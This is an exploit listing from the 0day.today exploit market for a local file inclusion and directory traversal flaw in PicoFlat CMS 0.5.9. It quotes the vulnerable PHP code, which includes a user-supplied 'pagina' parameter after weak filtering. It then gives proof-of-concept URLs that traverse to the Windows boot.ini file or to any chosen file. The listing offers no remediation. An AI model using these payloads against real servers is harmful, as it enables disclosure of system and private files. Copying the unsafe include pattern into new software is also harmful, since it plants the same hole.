[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)

Author
gmda
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3080
Category
web applications
Date add
28-05-2008
Platform
unsorted
============================================================
PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)
============================================================



---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda


---------------------------------------------------------------------------

bug code

<?php             if (eregi('://', $pagina) || eregi('\?', $pagina)) {
                $pagina = "";
                include "notfound.php";
            }else{
                include $pagina;             }
        ?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]




#  0day.today [2024-09-20]  #